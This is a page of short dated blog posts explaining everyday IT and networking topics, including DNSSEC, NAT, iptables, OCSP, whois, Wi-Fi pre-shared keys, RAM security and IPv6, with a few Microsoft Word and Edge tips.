MESI and MOESI are cache coherency protocols to ensure consistent data across CPU caches. The terms are abbreviations for the various states of the cache.
Thursday, 28 May 2026
Tuesday, 26 May 2026
Windows 11 Taskbar Icons Resize Dynamically
If you open too many applications, watch those icons shrink in your taskbar.
What is DNSSEC?
DNSSEC uses a cryptographic signature of DNS records to protect domains against forged DNS answers.
DNSSEC stands for Domain Name System Security Extensions, and comprises a suite of protocols to protect against DNS Spoofing, cache poisoning and man-in-the-middle attacks.
A scenario in layman's terms would be an attack that sends a user to a fake copy of your site. E-commerce and SaaS platforms in particular must take care to ensure they use DNSSEC for added protection.
DNSSEC can be skipped for very early stage projects where DNS server settings may change frequently.
Multi-signer DNSSEC is an additional way to implement DNNSEC. An RFC covers this (note that it is not an Internet Standard however), with contributors from Salesforce and Verisign.
Working with Word Templates
Word templates offer a good starting point for documents you may be required to mass-produce e.g. a document explaining IT strategy or architecture for multiple organizations. However they may not work well out-of-the-box.
Things to look out for:
1. Word templates may do funny stuff with margins. This is to create interesting and effective custom alignments - particularly for cover sheets. However, you may want to use more standard margins for the broader document if you need a more traditional, essay-style flow for your document. For this go to Layout and explore the various Margins, ranging from Narrow, Moderate, Wide up to Custom Margins.
2.Colour schemes. May be garish. Decide if you want to tone down the schemes for ease of printing. Or perhaps go the other way and tone up for maximum impact.
In short, expect to do a great deal of customisation, even if you have a standard template ready-to-run.
Who's that MAC?
Got a strange MAC address connecting to your private Wifi network?
Find out what kind of device it is using https://maclookup.app/.
The underlying database is regularly updated using IEEE and Wireshark data.
MAC addresses are 48 bits (6 bytes) long, the first 24 bits are known as the OUI (assigned by the IEEE Registration Authority to the vendor/manufacturer) and the last 24 bits are assigned by the manufacturer.
Basics of NAT
NAT refers to Network Address Translation.
NAT allows multiple devices in a private network to access the Internet using a single, public IP address. This results in a number of benefits, one being conservation of IP addresses (relevant for IPv4) and hides internal systems for added security.
Routers perform NAT to relay information between connected devices and the public Internet.
What is iptables?
iptables is a command in Linux for maintenance of IP packet filter rules in the Linux kernel. It enables configuration of security policies, control of incoming and outgoing traffic and network address translation (NAT).
iptables is not available in cmd.exe but it is available in WSL2.
A Windows Joe may therefore not have much exposure to iptables in day-to-day administration but should nevertheless have a good working knowledge of NAT and its terminology, as it's a universal networking concept.
Convert a Word Doc into A Presentation (Ad Hoc)
A Word doc can be brought to life as a presentation quite easily.
Go to View in the Ribbon.
Under Page Movement select Side to Side (this changes the display so you can see the flow of the document - it is not strictly needed - but helpful to start visualising flow).
Now under Views, you will most likely see "Print Layout" selected. Select instead "Read Layout".
This will start a presentation-mode document presentation.
(There is also a third layout; called Web Layout, which effectively turns your document into a web page - albeit a very messy one in all probability).
Friday, 22 May 2026
The Weird World of OCSP Revocation Checks
OCSP, or Online Certificate Status Protocol, enables real-time verification (for clients like web browsers) of digital certificate validity (rather than use downloaded lists of revoked certificates, a la CRLs, or certificate revocation lists).
It reduces overhead in validation (could be useful in real-time use cases e.g. transaction processing).
Statuses can be "good", "revoked" or "unknown".
Certificate Authorities (CAs) are mandated to track certificates they revoke.
whois under the hood (just basic TCP)
The whois protocol is a very basic TCP-based query-response protocol that gives information on domain names. Unfortunately, it is not installed by default in cmd.exe but is available in WSL.
It works by opening a TCP connection (SYN, SYN+ACK), query sent, response sent and a close (FIN, FIN)- very basic indeed. It has no mechanism for indicating character set used, and there has been no effort to support internationalisation in that respect. Historically the predominant encoding used has been US-ASCII.
It has no security provisions. Mechanisms for access control, integrity and confidentiality are excluded.
rdap is a modern alternative to whois. RDAP stands for Registration Data Access Protocol.
Thursday, 21 May 2026
jsDelvr - Free CDN for Open Source Projects
jsDelvr is a free CDN for open source projects ("fast, reliable, automated"). It is optimised for JS and ESM delivery (not "Enterprise Service Delivery" in this case but ECMAScript modules).
Monday, 18 May 2026
The HTTP 400 Error
The HTTP 400 error translates to Bad Request. It can sometimes be seen when attempting a logon to a website unsuccessfully.
In short, the server cannot process your request - potentially due to malformed URLs, corrupted cookies or outdated DNS data.
You can try flushing the DNS cache as well:
ipconfig /flushdns
which should yield the output "Successfully flushed the DNS Resolver Cache" if successful.
Friday, 8 May 2026
Debugging Web Access Issues with Microsoft Edge
Edge comes with Developer Tools (Control-Shift-I).
These tools are surprisingly powerful. The tools appear right next to the rendered webpage in the browser.
Suppose you are trying to log in to a service called "Microsoft New Service" but it doesn't work. The tab text says "Sign in to Microsoft New Service". Open up Dev Tools. Click on Network (the wifi-style icon).
Now reload the webpage.
You will see entire flow of HTTP requests and responses. A 200 response is status code OK, a 204 means No Content. In fact, any status code between 200 and 299 is a form of success. 300-399 are redirection messages, and anything about that represents an error.
You may be surprised by the number of conditional access-related HTTP requests that are involved in an authentication attempt.
Why Pre Shared Keys are not Wifi Passwords
It is tempting to think of wifi passwords as equivalent to Pre Shared Keys (PSKs) used in authenticating wifi connections. In fact, the wifi password is combined with the SSID (Service Set Identifier) of the wifi network to produce a 256-bit cryptographic key.
The Pre Shared Key model is not ideal for enterprise deployments, as anyone who knows the password can decrypt traffic, if they capture the handshake. IoT devices using Pre Shared Keys are also not secure where keys are leaked in plaintext logs. This is why there is a separate WPA2-Enterprise that abandons the PSK model.
WPA3-Personal replaced PSK with SAE (Simultaneous Authentication of Equals) to enhance security, adding a principle of forward security, by introducing unique keys for every session.
Tuesday, 5 May 2026
Protecting RAM
Attacks on RAM are one of the arguments to better protect data in use.
There are various security attacks on RAM. One is malware that can scrape memory e.g. for plaintext credit card numbers (once read into RAM prior to encryption). Modern systems aim to encrypt data as early as possible in the processing pipeline.
Privileged operators (e.g. cloud admins) can peek into RAM. This is why confidential VMs isolate memory to hide data-in-use from cloud providers.
DMA devices such as Thunderbolt peripherals can read system memory (and hence potentially sensitive data, from RAM). Modern operating systems restrict "hot-plug" DMA access.
Note: this list of compromise attacks is non-exhaustive. This is a big field of operations.
Microsoft's GitHub
Microsoft's GitHub is worth perusing from time-to-time. Some of the big projects are VS Code and TypeScript but many more additions are made to cover new directions like confidential computing.
Microsoft also have a website (opensource.microsoft.com) detailing their open source initiatives more broadly. The Microsoft open source blog is also worth reading.
IPv4 vs IPv6
Purpose of IP Addresses and the Problem IPv6 Solves
An IP address (Internet Protocol address) is a numeric label to identify a network interface of a computer or network node participating in a computer network using the relevant IP version.
IPv6 was created to tackle the problem of IPv4 exhaustion.
IPv6 uses 128 bit addresses, yielding an address space of 2^128 possible addresses. This contrasts massively with IPv4 which is only 32 bits!!
Why is there no Planned IPv7?
The address space of IPv6 is so large that address exhaustion is not a foreseen possibility, and hence no IPv7 is planned at present.
What transition technologies are in play to help move to IPv6?
There are some transition technologies e.g. NAT64, aimed at easing the transition from IPv4 to IPv6.
Apart from Bigger Address Space, what else does IPv6 Bring to the Table?
Apart from bigger size, IPv6 also adds some interesting new features. Learn these.
Subscribe to:
Posts (Atom)